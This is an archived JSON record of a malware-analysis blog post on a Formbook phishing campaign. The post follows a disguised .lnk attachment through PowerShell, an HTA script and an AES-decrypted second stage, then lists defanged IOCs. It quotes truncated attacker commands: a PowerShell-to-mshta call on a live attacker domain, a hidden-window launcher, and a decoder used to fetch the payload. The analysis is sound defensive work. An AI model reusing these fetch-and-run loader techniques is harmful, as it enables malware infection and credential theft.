{
	"id": "cc244455-de44-495e-b89a-baf35926475a",
	"created_at": "2026-04-06T00:11:05.030766Z",
	"updated_at": "2026-04-10T03:20:30.691967Z",
	"deleted_at": null,
	"sha1_hash": "f0e416cae6054b199bdeb6e85af333187f9316f4",
	"title": "[QuickNote] Examining Formbook Campaign via Phishing Emails",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 922985,
	"plain_text": "[QuickNote] Examining Formbook Campaign via Phishing Emails\r\nPublished: 2023-07-06 · Archived: 2026-04-05 18:19:02 UTC\r\n1. Initial foothold\r\nThe attacker sent an email with an attachment named “ brochure-for-2023-elite-events.rar ”. This rar file\r\ncontains only one lnk (shortcut) file named: brochure-for-2023-elite-events.pdf.lnk . If the user does not\r\npay attention and extracts the file, it will be displayed as a PDF icon like the following:\r\nThe analysis of this lnk file reveals that it utilizes powershell.exe to execute an hta script.\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \\W*\\\\\\*2\\\\\\msh*e ('http'+'://thanhancompa\r\n2. Analyzing HTA script\r\nDownload the file pintu.hta for analysis. This file contains a VBScript code snippet as follows:\r\nTo facilitate the deobfuscation of the code snippet above, I have modified it as follows:\r\nhttps://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/\r\nPage 1 of 7\n\nThe modified pintu.hta file is executed, resulting in a Vbscript containing a function that executes a\r\nsubsequent PowerShell script.\r\n3. Analyzing the 1\r\nst\r\n Powershell script\r\nZAA = \"powershell[.]exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -A\r\nThe script performs the following tasks:\r\nDecode the base64 string assigned to the variable $xbFz and uses the first 16 bytes as the IV, while the\r\nremaining part is the encrypted data:\r\nhttps://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/\r\nPage 2 of 7\n\nDecode the base64 string assigned to the variable $HMTijTI and use it as the AES key:\r\nUsing the key and IV, decrypt the encrypted data using AES in mode $BfslXFB.Mode =\r\n[System.Security.Cryptography.CipherMode]::ECB :\r\nBased on the result of the first two bytes being 0x1F 0x8B , we know that the decrypted data has been\r\ncompressed using Gzip. Decompressing this data yields the next PowerShell script:\r\nhttps://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/\r\nPage 3 of 7\n\n4. Analyzing the 2\r\nnd\r\n Powershell script\r\nThe important part of this script is as follows:\r\nfunction Dlt($iZq)\r\n{\r\n $IBY = 6399;\r\n $dtu = $Null;\r\n foreach($kKX in $iZq)\r\n {\r\n $dtu += [char]($kKX - $IBY)\r\n };\r\n return $dtu\r\n};\r\nfunction RPJ()\r\n{\r\n $oUv = $env: AppData + '\\';$DASUDIl= $env:AppData;$GXIrywM = $DASUDIl + '\\blank.pdf ';If(Test-Pat\r\n 883.exe '; if (Test-Path -Path $DauGlabYW){pmh $DauGlabYW;}Else{ $ZbmZaJRahvY = zPg (Dlt @(6503,6\r\nIt can be observed that it will use the Dlt function to decode the download addresses of the files (next stage\r\npayloads). By rewriting this function in Python and performing the decoding, we obtain the download addresses\r\nfor the payload and decoy PDF as follows:\r\n[+] Defanged URL(s):\r\nhttps://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/\r\nPage 4 of 7\n\nhxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf\r\nhxxps://thanhancompany[.]com/grip/883.exe\r\n5. Formbook payload\r\nAt the time of analysis, I was able to successfully download the payload, its sha256 is:\r\n00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4\r\nThe .NET payload, when executed, will unpack the final payload, which is the payload of the FormBook malware\r\n(this is likely a new build of the malware).\r\nhttps://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/\r\nPage 5 of 7\n\nUtilize Fakenet and monitor the payload generation process to generate traffic to hosts:\r\nhttps://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/\r\nPage 6 of 7\n\n6. IOCs:\r\nhxxp://thanhancompany[.]com/ta/pintu.hta Hta script\r\nhxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf Decoy PDF\r\nhxxps://thanhancompany[.]com/grip/883.exe Payload URI\r\n00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4\r\nPayload\r\nSHA256\r\nEnd.\r\nm4n0w4r\r\nSource: https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/\r\nhttps://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/"
	],
	"report_names": [
		"quicknote-examining-formbook-campaign-via-phishing-emails"
	],
	"threat_actors": [],
	"ts_created_at": 1775434265,
	"ts_updated_at": 1775791230,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f0e416cae6054b199bdeb6e85af333187f9316f4.pdf",
		"text": "https://archive.orkl.eu/f0e416cae6054b199bdeb6e85af333187f9316f4.txt",
		"img": "https://archive.orkl.eu/f0e416cae6054b199bdeb6e85af333187f9316f4.jpg"
	}
}